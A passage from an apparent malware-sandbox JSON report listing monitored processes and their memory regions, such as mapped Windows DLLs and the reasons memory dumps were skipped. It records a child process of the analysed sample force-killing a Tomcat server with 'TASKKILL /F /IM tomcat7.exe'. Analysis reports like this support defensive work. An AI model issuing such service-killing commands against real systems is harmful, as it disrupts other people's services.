"ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4487", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:33.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1784086528, "type": "region", "version": 1 }, "end_va": 1784700927, "entry_point": 1784215737, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4488", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1784086528, "timestamp": "00:01:33.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958248447, "entry_point": 1958155061, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4489", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:33.887", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM tomcat7.exe /IM tomcat7.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_38", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 38, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4490", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:34.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4491", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:34.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4492", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:34.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_4493", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:34.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_4494", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:01:34.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_4495", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:01:34.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_4496", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:34.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 11862016, "type": "region", "version": 1 }, "end_va": 11952127, "entry_point": 11885705, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4497", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 11862016, "timestamp": "00:01:34.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4498", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:34.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4499", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:34.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4500", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:34.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4501", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:34.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4502", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:34.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4503", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:34.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4504", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:34.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4505", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:34.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4506", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:34.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_4507", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:34.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4508", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:34.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4509", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:34.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4510", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:34.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4511", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:34.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4512", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:34.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4513", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:34.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4514", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:34.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 262143, "entry_point": 0, "filename": null, "id": "region_4515", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:34.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1142783, "entry_point": 720896, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4516", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 720896, "timestamp": "00:01:34.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_4517", "name": "private_0x0000000000650000", "norm_filename": null, "region_type": "private_memory", "start_va": 6619136, "timestamp": "00:01:34.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4518", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:34.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4519", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:34.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4520", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:34.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4521", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:34.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958998015, "entry_point": 1958941345, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4522", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:34.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959284735, "entry_point": 1959072725, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4523", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:34.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959366655, "entry_point": 1959335334, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4524", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:34.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959395328, "type": "region", "version": 1 }, "end_va": 1959464959, "entry_point": 1959400192, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4525", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959395328, "timestamp": "00:01:34.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959526400, "type": "region", "version": 1 }, "end_va": 1959579647, "entry_point": 1959530976, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4526", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959526400, "timestamp": "00:01:34.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4527", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:34.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4528", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:34.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4529", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:34.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4530", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:34.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4531", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:34.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4532", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:34.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4533", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:34.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4534", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:34.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4535", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:34.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4536", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:34.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4537", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:34.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4538", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:34.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4539", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:34.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4540", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:34.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4541", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:34.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4542", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:34.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4543", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:34.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4544", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:34.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4545", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:34.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, 